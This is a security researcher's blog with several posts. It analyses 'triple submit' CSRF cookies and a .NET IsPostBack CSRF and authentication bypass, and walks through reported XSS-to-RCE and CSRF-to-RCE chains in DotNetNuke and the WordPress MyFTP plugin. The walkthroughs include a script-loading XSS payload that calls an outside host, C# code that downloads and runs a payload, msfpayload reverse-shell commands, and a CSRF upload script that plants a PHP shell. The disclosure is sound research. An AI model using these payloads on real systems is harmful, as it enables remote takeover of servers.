Analysis of John Wilander’s Triple Submit Cookies

TLDR

At OWASP Appsec Research John Wilander recently presented an interesting CSRF mitigation – an enhancement to double submit he calls “triple submit”. It’s not implemented yet, but the idea would mitigate some of the problems with a naive double submit algorithm. This post takes a look at that and comes away with the conclusion that triple submit is an improvement over a naive double submit implementation, but doesn’t mitigate CSRF problems as well as other widespread stateless solutions in use.

Background

Double submit cookie mitigations to CSRF are common and implementations can vary a lot. The solution is tempting because it’s scalable and easy to implement. One of the most common variation is the naive:

if (cookievalue != postvalue)
    throw CSRFCheckError

In other words, if an attacker can write a cookie, they can defeat the protection. I’ll refer to this as “naive double submit” for the rest of this post.

Naive double submit has a couple weaknesses. Writing cookies is a lot easier than reading them. Anyone on the same local network can write cookies, or you can write them with an XSS in a neighboring domain. We chatted about this a bit in our 28c3/Blackhat AD talk. As part of that, I showed a bug I opened against owa in 2010, which used to use a naive double submit implementation (and is now fixed, as is the neighbor XSS used to write the cookies). Also, check out my mad video editing skills, which I used to censor people who emailed my test account by accident and probably didn’t need to be censored anyway, but that’s just how I roll.

Better versions of double submit are common also. One variation is to tie the submit values to the session identifier (e.g. the token is a hash of the session ID). ASP.net MVC4 implements something sort of similar to this, and I think what they do is pretty good. I dropped this into reflector to see how it’s implemented.

First in System.Web.Helpers.AntiXsrf.Validate

public void Validate(HttpContextBase httpContext, string cookieToken, string formToken)
{
    this.CheckSSLConfig(httpContext);
    AntiForgeryToken token = this.DeserializeToken(cookieToken);
    AntiForgeryToken token2 = this.DeserializeToken(formToken);
    this._validator.ValidateTokens(httpContext, ExtractIdentity(httpContext), token, token2);
}

Then look at what ValidateTokens is doing:

    public void ValidateTokens(HttpContextBase httpContext, IIdentity identity, AntiForgeryToken sessionToken, AntiForgeryToken fieldToken)
    {
        if (sessionToken == null)
        {
            throw HttpAntiForgeryException.CreateCookieMissingException(this._config.CookieName);
        }
        if (fieldToken == null)
        {
            throw HttpAntiForgeryException.CreateFormFieldMissingException(this._config.FormFieldName);
        }
        if (!sessionToken.IsSessionToken || fieldToken.IsSessionToken)
        {
            throw HttpAntiForgeryException.CreateTokensSwappedException(this._config.CookieName, this._config.FormFieldName);
        }
        if (!object.Equals(sessionToken.SecurityToken, fieldToken.SecurityToken))
        {
            throw HttpAntiForgeryException.CreateSecurityTokenMismatchException();
        }
        string b = string.Empty;
        BinaryBlob objB = null;
        if ((identity != null) && identity.IsAuthenticated)
        {
            objB = this._claimUidExtractor.ExtractClaimUid(identity);
            if (objB == null)
            {
                b = identity.Name ?? string.Empty;
            }
        }
        bool flag = b.StartsWith("http://", StringComparison.OrdinalIgnoreCase) || b.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
        if (!string.Equals(fieldToken.Username, b, flag ? StringComparison.Ordinal : StringComparison.OrdinalIgnoreCase))
        {
            throw HttpAntiForgeryException.CreateUsernameMismatchException(fieldToken.Username, b);
        }
        if (!object.Equals(fieldToken.ClaimUid, objB))
        {
            throw HttpAntiForgeryException.CreateClaimUidMismatchException();
        }
        if ((this._config.AdditionalDataProvider != null) && !this._config.AdditionalDataProvider.ValidateAdditionalData(httpContext, fieldToken.AdditionalData))
        {
            throw HttpAntiForgeryException.CreateAdditionalDataCheckFailedException();
        }
    }
}

Even given the assumption the attackers can write cookies, this is difficult to attack. It’s stateless, and it does compare the cookie to forms, but it also extracts and validates username, the claimUid, and any additional data. By default, one user’s token won’t work on another user or another session. I don’t know the details of other stateless CSRF implementations, but with sites that look like they’re doing things right (Gmail CSRF protection) I’d bet they do something similar.

Any proposed new CSRF protection should offer some advantage against existing commonly implemented solutions (e.g. ASP.net MVC CSRF protection). It doesn’t need to be better at everything, but it should be better at something.

Triple Submit Cookies

John Wilinder recently wrote up an interesting variation on the double submit scheme called “triple submit”. Thanks to John for writing this up, it’s great people are looking at this problem – web app people often don’t realize how easy cookie writes can be. There’s no implementation for triple submit available at the moment, but this is what I gather:

  • The value of the cookie is compared with the POST value, like a regular double submit.
  • A cookie is set with HTTP-Only
  • There can only be exactly one cookie with the prefix in the request or the request fails.
  • The name of the cookie has a prefix plus random value (e.g. random-cookie7-afcade2…).

Let’s look at these one by one.

Cookie == Post, HTTP-Only

Checking that a cookie is equal to POST is the same as the naive double submit solution I mentioned above. It does add security, but has weaknesses. Like I mention above, people in neighboring domains can write cookies, and people in the middle can write cookies.

HTTP-Only is irrelevant in this case. The property matters when reading cookies, but not writing new ones.

Exactly One Cookie with the Prefix

The third bullet does add security when compared with the naive solution. A common attack with naive double submit is to write a cookie with an XSS in a neighboring domain (e.g. from site1.example.com to site2.example.com). If the user is logged in with cookies and they write a single cookie of their own, this will create two cookies, which the server could detect. This is pretty good, and prevents quite a few attacks, or at least makes them a lot harder.

There are still several issues I have with this:

First, performance penalty/implementation flaws. It might be more complicated than you think to verify exactly one cookie is being sent. A lot (most?) web application frameworks treat reading cookies as a case insensitive dictionary. In PHP, the $_COOKIE variable is theoretically an array of all the cookies, but if the browser sends “Cookie: csrf=foofoofoofoofoofoofoofoo; csrf=tosstosstosstosstoss; CsRf=IMDIFFERENT”, the array will only contain the first one. It’s similar with .NET’s Request.Cookie array, and most other server side implementations. One example of an implementation flaw is if the code made the (unlikely) mistake of referencing the POST value (e.g.Request.cookies[$POST_VAL]) then an adversary could attack this in the same way he’d attack the naive double submit. To prevent this, it seems like triple submit would have to iterate through each cookie name value pair and check for the prefix. What’s the performance penalty? It might be negligible, but with modern applications having dozens of cookies that would have to be iterated on with each request, it is something that should be measured.

Second, not all login methods require cookies. Say triple submit was implemented without any implementation flaws, but somebody used this as the method to prevent CSRF on a single sign on Kerberos/NTLM authed website. If the victim hasn’t logged in so that their token is set, an attacker could toss a cookie of the correct format (random-cookie7-…) and the exploitabiliy would be equivalent to the naive double submit. There would only be one cookie so the check would pass, and it’s SSO so the victim is always logged in.

Third, all browser cookie-jars overflow eventually. This attack would be difficult, but aren’t a lot of attacks when they start as ideas? Say the victim’s browser had cookies that looked like this:

AuthCookie=<guid>;Name=websters;random-cookie7-<random value>=<guid>

In triple submit, the POST value has to match the random-cookie7 prefix. One attack would be to overflow the cookie jar with some precision, so that it overflows random-cookie7, but not AuthCookie. In the end, it might look like the following:

random-cookie7-<attacker-value>=<attacker guid>;filler=1;filler=2;....
AuthCookie=<guid> (rest has overflowed)

Using this, an attacker could potentially bypass the CSRF protection.

Cookie Name with Prefix

The cookie name is the third thing submitted in the ‘triple submit’ solution. This probably doesn’t add security in the XSS neighbor case, but does add some in the MiTM case.

It’s common for people think there is only one cookie written if the cookie name is the same. Whenever I’ve tested, this isn’t the case. Even if the “tossed cookie” names are identical the browser still sends two cookies. Let’s look at an example.

A legitimate site, example.com might set a cookie:

<script>
document.cookie = "csrf=foofoofoofoofoofoofoofoo; expires=Wed, 16-Nov-2013 22:38:05 GMT;";
</script>

If a neighboring site, host1.example.com tries to write a cookie with the same name:

<script>
document.cookie = "csrf=tosstosstosstosstoss; domain=.example.com; expires=Wed, 16-Nov-2013 22:38:05 GMT;";
</script>

In major browsers there now exist two cookies with the same name. In the requests to example.com it now looks something like this:

Cookie: csrf=foofoofoofoofoofoofoofoo; csrf=tosstosstosstosstoss

The point of this is, in the neighbor XSS case there will almost always be more than one cookie in the request whether there’s a hidden unique name or not.

Another more rare but applicable attack is a MiTM where an attacker is trying to overwrite a secure HTTPS-only cookie from an HTTP site. This is a different story. If I’m in the middle, I can write cookies, even secure ones, as long as I know the name of the cookie. Randomizing the cookie name makes an attack quite a bit harder; the goal shifts from overwriting something specific to trying to expire a random cookie where I don’t know the name. However, I can still imagine attacks on an implementation of triple submit when you’re in the middle: If the server legitimately expires the CSRF tokens (it would probably have to at some point) you might be able to force this request. If the cookies don’t have expire dates, you could crash the browser to force these cookies to expire. If the random piece of the cookie name isn’t that long you could expire millions and eventually guess the right one. There might also be clever SSL tricks that cut up certain responses so that an old cookie is expired but the new one isn’t set (leaving you free to set one). Speculative attacks on speculative implementations aside, with a good implementation having the random name would at least make overwriting the cookie from the middle significantly more difficult.

The Simplicity Advantage?

I think the best argument in favor of triple submit versus a double submit tied to the auth tokens (e.g. MVCv4) would be one of simplicity. I don’t like this argument much for a few reasons

  • Implementation wise, CSRF mitigations only need to be implemented one time per framework, and implementation isn’t substantially more difficult to code one way or the other.
  • You always need at least some minimal knowledge of the application. If you were to put a CSRF solution into a WAF and added this as a rule for all POST requests, what if the application sometimes also changes state for GET? Solutions tied with auth tokens really wouldn’t be much more complicated, even with WAF type scenarios.
  • Although with triple submit the idea is simpler, I think there are quite a few more gotchas, and it seems more easy to mess up. This is somewhat subjective, but I’ve tried to point out a few ways the implementation could have problems in this post

Conclusions

Triple cookie submit is an improvement over naive double submit. Naive double submit makes some CSRFs more difficult to exploit, and like that, triple submit makes many vectors even more difficult to exploit. However, there are still attack vectors that triple submit doesn’t protect against – overflowing the cookie jar, CSRF against SSO auth, and probably some clever MiTM vectors. Although triple submit offers some additional security, I think this is still worse than other existing solutions.

Interesting Problems with .NET IsPostBack()

First, credit where credit is due: Bryan Jeffries (plug here for his awesome book) talked with me about this problem a couple years ago. Since then I’ve found half a dozen bugs related to IsPostBack, but I’ve never seen the potential problems written out. Thus, this post.

What does IsPostBack Do?

The MSDN article provides some insight into how most developers will treat ispostback. It says, “true if the page is being loaded in response to a client postback; otherwise, false.”

Here’s the snippet they include:

 private void Page_Load()
{
    if (!IsPostBack)
    {
        // Validate initially to force asterisks
        // to appear before the first roundtrip.
        Validate();
    }
}

How does this actually work? Below are a handful of test cases along with results.

Simple GET request, validate() is not called

GET /postback.aspx HTTP/1.1
Host: localhost:31907

Same with a simple POST, validate() is not called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Content-Type: application/x-www-form-urlencoded

a=1

Legitimate postback, as expected, validate() is called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Cookie: ASP.NET_SessionId=l1ghpm2rocgh0verdtbdaydc
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjI0NjY1NDA2D2...

Here’s the interesting thing. a POST with an empty viewstate and validate() is called

POST /postback.aspx HTTP/1.1
Host: localhost:31907
Cookie: ASP.NET_SessionId=l1ghpm2rocgh0verdtbdaydc
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

__VIEWSTATE=

Maybe even more interesting, a GET with an empty viewstate and validate() is called. So the postback doesn’t even need to be a POST!

GET /postback.aspx?__VIEWSTATE= HTTP/1.1
Host: localhost:31907

If a developer takes what MSDN says at face value – that the page is being loaded in response to a client postback – they may occasionally rely on this as a security measure without realizing it.

CSRF Vector

Let’s modify our earlier project a bit and compile it with .net 3.5

    public partial class postback : System.Web.UI.Page
    {
        protected override void OnInit(EventArgs e) 
        {
            base.OnInit(e);
            Page.ViewStateUserKey = Session.SessionID;
            
        }

        protected void Page_Load(object sender, EventArgs e)
        {
            if(!IsPostBack)
            {
                Response.Write("Error, this page is after a post");
            }
            else
            {
                Response.Write("Ok, you're cool");
                //process
            }
        }
    }

First, note There are a lot of things //process can do. Upload files, call an operation that deletes users, etc. The one caveat for our attack is that VIEWSTATE needs to be empty. There are a lot of times this is the case with builtin .net functions. Uploading files, SQL operations, file operations, etc all just don’t require VIEWSTATE to work.

Secondly, note that VIEWSTATEUSERKEY is set to the session ID. This is generally the recommended way to protect against CSRF in .net. It’s very common for developers to set this in a master page and not think about CSRF anymore – and I agree… that’s the way it should be in an ideal world. But unfortunately it’s not always the case. In the above project, if the request is sent with an empty VIEWSTATE then //process is hit.

The root cause of this can be found in the HiddenFieldPageStatePersister Load method. Opening this with reflector, you can see that if requestViewStateString is empty then the check is bypassed:

    public override void Load()
    {
        if (base.Page.RequestValueCollection != null)
        {
            string requestViewStateString = null;
            try
            {
                requestViewStateString = base.Page.RequestViewStateString;
                if (!string.IsNullOrEmpty(requestViewStateString))
                {
                    Pair pair = (Pair) Util.DeserializeWithAssert(base.StateFormatter, requestViewStateString);
                    base.ViewState = pair.First;
                    base.ControlState = pair.Second;
                }
            }
            catch (Exception exception)
            {
                if (exception.InnerException is ViewStateException)
                {
                    throw;
                }
                ViewStateException.ThrowViewStateError(exception, requestViewStateString);
            }
        }
    }

This is hardened in ASP.net 4.0, where the if statement adds a check to see if the ViewStateUserKey is null.

 if (!string.IsNullOrEmpty(requestViewStateString) || !string.IsNullOrEmpty(base.Page.ViewStateUserKey))

So in .net 4.0, this CSRF bypass shouldn’t work as long as viewstateuserkey is set.

Auth Bypass Vector

A less common vector is when developers don’t auth their pages properly. This can be very context specific, but I found this problem in an admin application, and it had some very interesting consequences. A dumbed down version of the code is the following, which could be bypassed with an empty viewstate. Again, if the actions require VIEWSTATE and event validation, the attacker is hosed. But if this is a common construct, you’re bound to find some operations that don’t

protected void Page_Load(object sender, EventArgs e)
{
    if(!IsPostBack)
    {
        //authenticate user, show options based on auth
    }
    else
    {
        //process, an attacker can hit this without auth
    }
}

The assumption here is the same as the CSRF vector, that the “the page is being loaded in response to a client postback”. That is what MSDN says, after all. The developers are just interpreting it a certain way :) I don’t think MSDN is in the wrong here. What I do find interesting is how a non-security feature can cause a decent number of issues just because of the assumptions that people make.

Server Shells from Web Clientside Attacks

One kind of attack that seems to be popular these days is the “broad impact” attack. These are the vulnerabilities that include “CSRF logout on Facebook” or “Self XSS using drag and drop on code.google.com”. The impact of these attacks is sometimes limited, but that’s made up for in a big way because there are just so many people that use Google and Facebook.

This post is kind of the opposite of that.*

Remember all those bug bounties and bulletins that security researchers have got for targeting a custom support internal web application and using that to compromise everything? Oh yeah, most companies probably don’t want to encourage that sort of delinquent behavior. And although these types of attacks are not “broad impact”, the criticality of these bugs can be freaking scary.

DotNetNuke XSS to RCE

One example of this can be shown by using one of the bugs I found with DotNetNuke.

This was kind of interesting. It turns out on a default install anyone can send “messages” which are kind of like a DotNetNuke version of email. You can get script into these messages, and with script running in an administrator account you get RCE. Pretty much every piece of this is straightforward.

  • The XSS is trigerred with HTML editable pages via <img src=”http://asdfasdf/blah&#8221; alt=”” />
  • The host user has a lot of power, and can do things like upload arbitrary aspx pages and execute them (as shown in the demo) or execute arbitrary SQL

Here are the repro steps for dotnetnuke 6.00.01, which was the current version when I found this:

  • Create metasploit connectback
  • Create metasploit listener
  • Start shell of the future… or do several requests and scrape VIEWSTATE which is the csrf mitigation. We can’t simply steal the session cookie since it’s set to httponly.
  • Get XSS in the host account. The basic XSS is simply an img onerror. The payload for shell of the future looks like this, but before sending it needs to be HTML encoded:
 
javascript:eval("s=document.createElement('script');
s.src='http://192.168.154.137:8000/e1.js';
document.getElementsByTagName('head')[0].appendChild(s)") 
  • With the XSS shell or dynamically with Javascript if you have time, enable aspx uploads. Note that at this point SQL injection is also possible.
  • Create an RCE C# script to execute meterpreter and upload to the server.

<script type="text/javascript">// <![CDATA[
 protected override void OnLoad(EventArgs e)
 {
 System.Net.WebClient client = new System.Net.WebClient();
 client.DownloadFile(@"https://webstersprodigy.net/manuploads/test92.txt", @"C:\windows\TEMP\test92.txt");
 System.Diagnostics.Process p = new System.Diagnostics.Process();
 p.StartInfo.UseShellExecute = false;
 p.StartInfo.RedirectStandardOutput = true;
 p.StartInfo.FileName = @"C:\windows\TEMP\test92.txt";
 p.Start();
Response.Write("Success");
 }
// ]]></script>

  • Finally, force browse to the page for a shell.

They fixed this with the bulletins below, although not sure I agree with the low/moderate rating since it’s pretty much a guaranteed shell as long as admins read their dotnetnuke messages.

http://www.dotnetnuke.com/News/Security-Policy/Security-bulletin-no.60.aspx

http://www.dotnetnuke.com/News/Security-Policy/Security-bulletin-no.62.aspx

WordPress MyFTP plugin CSRF to RCE

Have you ever used a piece of software, and you just know it’s hackable? That’s how I’ve been using MyFTP on this very site for a while. It’s an incredibly useful tool. It looks like it’s not super popular, but apparently the most recent version has had over 28,000 downloads at the time of this writing.

So I finally decided to look at this. It turns out everything is vulnerable to CSRF. There are several nasty exploits here. One of the easiest is being able to delete any file with the right permissions. Another easy one is being able to edit any file with the right permissions. One that’s a bit less straightforward is the file upload feature.

In this demo attack, I opted to try the file upload route using this technique I’ve been wanting to try for a while now: http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html. The idea is that you use CORs to send the cross domain request, and you have more control over things like headers and multi part data. There’s the origin header sent, but who cares because the application ignores it.

Here are the repro steps:

1. Create Stage 1

It’s super cool that metasploit has a php meterpreter payload now. The raw php looks something like this:

./msfpayload php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > bad.php

But since I’m uploading this using Javascript in step 2, I want a more JS-friendly format.

./msfpayload php/meterpreter/reverse_tcp LHOST=71.197.218.6  LPORT=443 -t pl | tr “.” “+” > js_php

2. Stage 2 Listener

use exploit/multi/handlerset PAYLOAD php/meterpreter/reverse_tcpset LHOST x.x.x.xexploit

3. Create a malicious page that uploads the PHP file using the CSRF bug

Using the CORs techniques mentioned above, the CSRF script will look similar to the following:

<script type="text/javascript">// <![CDATA[
function fileUpload(url, fileData, fileName) {
 var fileSize = fileData.length,
 boundary = "xxxxxxxxx",
 xhr = new XMLHttpRequest();
 xhr.withCredentials = "true";

 xhr.open("POST", url, true);
 // simulate a file MIME POST request.
 xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
 xhr.setRequestHeader("Content-Length", fileSize);

 var body = "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="desiredLocation"' + 'rnrn';
 body += '/var/www/public_htmlrn';
 body += "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="upfile"; filename="' + fileName + '"rn';
 body += 'Content-Type: text/plainrnrn';
 body += fileData + "rn";
 body += "--" + boundary + "rn";
 body += 'Content-Disposition: form-data; name="upload"rnrn';
 body += 'Upload To Current Pathrn';
 body += "--" + boundary + "--";

 xhr.send(body);
 return true;
}

//encoded stage 1 payload in JS friendly form... from step 0
var data =
"x3cx3fx70x68x70x0ax0ax65x72x72x6fx72x5f" +
"x72x65x70x6fx72x74x69x6ex67x28x30x29x3bx0a" +
...

fileUpload('https://webstersprodigy.net/wp-admin/options-general.php?page=MyFtp&dir=/var/www/public_html/', data, 'bwahaha.php');
// ]]></script>

4. Profit

Now that the page is uploaded, visit it, and get a shell.

I reported this bug to wordpress, who has a great security team full of smart responsive people, and this was their response. This seems like the right course of action to me:

“The security team reviewed the report and based on the nature of the vulnerability, the current state of the plugin (unmaintained, not updated), and the inability to contact the author, they have decided the best course of action is to just remove it from the plugin directory. This also means that it will not be returned in any API results, etc making it impossible to install from the built-in plugin installer in the WordPress dashboard.”

It would be cool to notify the people who have the plugin installed, but I have no idea if WordPress would even have that kind of information.

Conclusions

So lets look at the nature of these types of attacks. When you have a powerful account/application, clientside attacks may be tougher to exploit realistically (it’s tougher to get a specific admin to visit your evil website than just somebody random who happens to be logged into Facebook) but there can also be a bigger payoff.

As consumers, if you use a powerful feature then I think it’s smart to run these types of things in their own incognito session or environment so clientside attacks like these are harder to pull off. As security people trying to make the web a safer place, I think this is a bit of a blind spot. We spend a lot of time and money making our car bullet proof and then leave the doors unlocked.

*Not to diminish the “broad impact” bugs. Those are awesome too.

Is it already 2012?

I thought about starting a new blog, it’s been that long.

Giving our talk, “New ways I’m going to hack your web app” at Bluehat 2011 was awesome. I practiced so much that everything just went well. Unfortunately I managed to forget a ton of it for 28c3/Blackhat and I spoke way too fast (I always do the same thing when I get nervous and don’t think about it).  Not to mention all my favorite content was needlessly censored. That sucks, but hopefully as I talk more things will get better.

I hate watching that, by the way. The cool thing is there were a lot of people, I think the room holds about 1000. So that was scary, but also a great experience.

Here is the whitepaper:
https://skydrive.live.com/redir.aspx?cid=3ac0418833532dff&resid=3AC0418833532DFF!249&parid=3AC0418833532DFF!264

and the slides:
https://skydrive.live.com/redir.aspx?cid=3ac0418833532dff&resid=3AC0418833532DFF!250&parid=3AC0418833532DFF!264

Toorcon 2010 Talk

My over caffeinated self somehow managed to stumble through the talk at toorcon. I’m self critical over the whole thing, but still overall a great experience, and I’m glad I did it.

I was totally nervous. This was my first ‘con’ and the room was packed (people standing at the wall), I spotted relatively famous hackers in the audience, etc. I needed more beer!

Hopefully the next one I’ll relax, slow down, not use filler words, etc :)